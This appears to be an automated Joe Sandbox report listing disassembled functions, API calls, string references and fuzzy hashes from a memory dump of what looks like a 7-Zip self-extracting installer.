String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
Instruction ID: 4488bc9e4ce621475e7ac020b16d4e8be87a05eb600b5e71f20f3fc481b48b4f
Opcode Fuzzy Hash: 234a46bb65b67f966a8e437df7229c99e997b16022daf5c37f9ee439fb3c0353
Instruction Fuzzy Hash: 7811C975900109AACF05FFA2D856CEDBB78AF14308F10846AF561760E2DF789B99CB48

Function 00404328 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?,?,?,004068AF,00000000), ref: 0040436E
??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000,00404980,?,?), ref: 004043AC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?,00000000), ref: 004043D2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041A7D8,?,?,?,%%M\,0041A7E8,?,?), ref: 004043DA

Strings

%%M\, xrefs: 0040434E
%%M/, xrefs: 0040438C

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
Instruction ID: 1e1ecd5a4810495ff1b5747c8ad1555e4ca49c286c4952b26a2a60c5b9476409
Opcode Fuzzy Hash: 912668388eac2bfc377ae5e16b5c219b7d863f1ca1c26d4b178e3f78348507e0
Instruction Fuzzy Hash: D411C971900109AACF05FFA2D856CEDBB79AF14308F10846AF551760E2DF785A9ACB58

Function 00408504 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408519
SHBrowseForFolderW.SHELL32(?), ref: 00408532
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0040854E
SHGetMalloc.SHELL32(00000000), ref: 00408578

Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307

Strings

A, xrefs: 0040855F
A, xrefs: 0040852B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID: A$A
API String ID: 1557639607-3025247501
Opcode ID: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
Instruction ID: 8e2b46382c4e0e79c38c40a6d9053323f47f27154f6d6a29afbbbbb9270b0dc0
Opcode Fuzzy Hash: 7184c409714950e4399974884f9922c096c63a12bd23a875202a47cc40967fbf
Instruction Fuzzy Hash: 41114FB1A00204ABCB10DB95DA48BDE77BCAB88701F1400AEE905E7281DB79DE04CB75

Function 00407DAC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00409133,000004B1,00000000,?,?,?,?,?,00409240), ref: 00407DB4
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407DC5
GetWindow.USER32(?,00000005), ref: 00407DDE
GetWindow.USER32(00000000,00000002), ref: 00407DF4

Strings

uxtheme, xrefs: 00407DAD
SetWindowTheme, xrefs: 00407DBF

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$uxtheme
API String ID: 324724604-1369271589
Opcode ID: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
Instruction ID: 9b0de1ac587a4165001920f6b170f50534138ecb837747bbddd8b6d978bb5341
Opcode Fuzzy Hash: df7da54084a7170c4669871585b62670c16e7ba2a7afe7f20da463cc21b0505e
Instruction Fuzzy Hash: D3F0A732E4672533C232126A6C48FAB769CDF46B51B094136BD04F7390DFA8DC4041ED

Function 0040B7A0 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
??3@YAXPAX@Z.MSVCRT ref: 0040B866
??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
Instruction ID: 99a0ad40a844e9a3ffa9f049326f458531d7c56977f80c19912095adb51eb10a
Opcode Fuzzy Hash: 47906053c5a29f528d9a88d94d720d9e3123c9d8a4fc5e07c1a02bdcf041b227
Instruction Fuzzy Hash: 284159B56003048FCB14DF19D880A57B7E9FF88304F14856EEC4A9B346D779E919CBAA

Function 0040599C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,0041EA30,00000001,0041EA30,0041EA30,00000001,?,00000000), ref: 00405A1E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A80
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0041EA30,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041E464,0041EA30,00000001,?,00000000), ref: 00405A98

Part of subcall function 004039E7: lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
Part of subcall function 004039E7: GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
Part of subcall function 004039E7: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
Part of subcall function 004039E7: ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30

Strings

;!@Install@!UTF-8!, xrefs: 00405A39
;!@InstallEnd@!, xrefs: 00405A53

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-372238525
Opcode ID: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
Instruction ID: 1d6f72d44ce7b26bafcc2ee4707833dd2b606594c716bb38fa5c6a696ed85d5e
Opcode Fuzzy Hash: ae470c15fb9ab93de0ad4030f77c14c07a8208b8d7926a28e8ed83b0eb248ccf
Instruction Fuzzy Hash: 05311B7490022AAACF05EF92CD828EEBB79FF58318F10042BE810761E1DB795645DE58

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401053
wsprintfW.USER32 ref: 00401071
lstrcatW.KERNEL32(?,?), ref: 00401084
ExitProcess.KERNEL32 ref: 004010AC

Strings

0x%p, xrefs: 0040106B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
Instruction ID: 10afd36f4070d89f293b01a92875ce402ef2d19f58a346a7dbf4abb5c9f18492
Opcode Fuzzy Hash: 217280ca1667caf64bbadd46d79608ffb89a528de629757afe78e206874d1f67
Instruction Fuzzy Hash: 531182B5801208EFCB20EFB5DD85DDA73B8AF04304F00447BE645B3191D778AA948B5A

Function 00402E67 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402E98
??3@YAXPAX@Z.MSVCRT(?), ref: 00402EA1

Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD

ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402EB9
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402ED9

Strings

SetEnvironment, xrefs: 00402EA9, 00402EB8

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID: SetEnvironment
API String ID: 612612615-360490078
Opcode ID: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
Instruction ID: 9a1053b96c855abc576ef2a573940a7f22d1fb52882628247968529f0f67b02c
Opcode Fuzzy Hash: a35de80e7cad52e5dc6298b6344b4de1a7c54804515ee2809541825fa383ffde
Instruction Fuzzy Hash: 66015276900104BADB14AB95DD819EEB7BCEF48314F10416BFD01B21D1DB786A408A99

Function 004049A9 Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0041E3F0,00000020,?,?,?,?,?,00406547,?,?), ref: 004049C2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A74
??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A7C
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?,?), ref: 00404A8B
??3@YAXPAX@Z.MSVCRT(00406547,?,?,?,?,?,?,?,?,?,?,?,?,?,00406547,?), ref: 00404A93

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
Instruction ID: d6d6aeb9fd97b078be875a6c61f5694a486b541387e48e1a0363308d58f113ad
Opcode Fuzzy Hash: c711911c71359a81b636e744b23c888f5a56011177dd5790178befb7102576d2
Instruction Fuzzy Hash: 2E21E3B6E40205ABCF206FB5CC029EB77A8EF84355F10447BEE41B72D1E7784D858A99

Function 00408828 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000B), ref: 004081F6
Part of subcall function 004081CE: GetSystemMetrics.USER32(0000000C), ref: 004081FF

GetSystemMetrics.USER32(00000007), ref: 0040883F
GetSystemMetrics.USER32(00000007), ref: 00408850
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00408917

Strings

100%% , xrefs: 0040886F, 00408876, 004088CF

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
Instruction ID: c0f787396fa6b3de95c2f82887938995bcf82f961e42ceb6ace71c8d1a060617
Opcode Fuzzy Hash: 35692a44e7e546f69739d1069c7bb9c29da4a7b1d3d728d8f1a694ecacf6944a
Instruction Fuzzy Hash: 51318171A007059FCB24EF6ACA459AEB7F4EF54704B00052ED982A72D1DB78FE44CB99

Function 00404505 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00406EB0,00000000,?,ExecuteFile,0040454C,00000000,00000000,00406EB0,?,waitall,00000000,00000000,?,?,0041E9E8), ref: 00404512
lstrlenW.KERNEL32(?,?,?,0041E9E8), ref: 0040451B
_wcsnicmp.MSVCRT ref: 00404527

Strings

ExecuteFile, xrefs: 00404505

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: lstrlen$_wcsnicmp
String ID: ExecuteFile
API String ID: 2823567412-323923146
Opcode ID: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
Instruction ID: a2e0a5f2a3f105f817df911ac3b4dcd355adebb597ea1c4786e8ca368391ef02
Opcode Fuzzy Hash: 269407e104d2b8646f4c579596136b213b345037a5b1e74df4f09ef425281859
Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6

Function 004026AB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
GetProcAddress.KERNEL32(00000000), ref: 004026C5

Strings

Wow64RevertWow64FsRedirection, xrefs: 004026B4
kernel32, xrefs: 004026B9

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E

Function 004026DF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
GetProcAddress.KERNEL32(00000000), ref: 004026F7

Strings

Wow64DisableWow64FsRedirection, xrefs: 004026E6
kernel32, xrefs: 004026EB

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F

Function 004030CC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2

Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668

Function 004048A3 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
wsprintfW.USER32 ref: 00404919
GetFileAttributesW.KERNEL32(?), ref: 00404934

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98

Function 0041271D Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,0041C670), ref: 00412748
??2@YAPAXI@Z.MSVCRT(00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 00412770
memcpy.MSVCRT(00000000,006BC5D0,00000004,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?), ref: 00412799
??3@YAXPAX@Z.MSVCRT(006BC5D0,00000000,0041E3DC,?,?,00412815,0000007D,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 004127A4

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
Opcode Fuzzy Hash: 7565129bc99c0d9bd0404751a75788fc8418b784189d73e03d7ab145d8551701
Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758

Function 004091A7 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C

Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
GetDlgItem.USER32(?,000004B7), ref: 00409222
SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230

Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68

Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307

Memory Dump Source

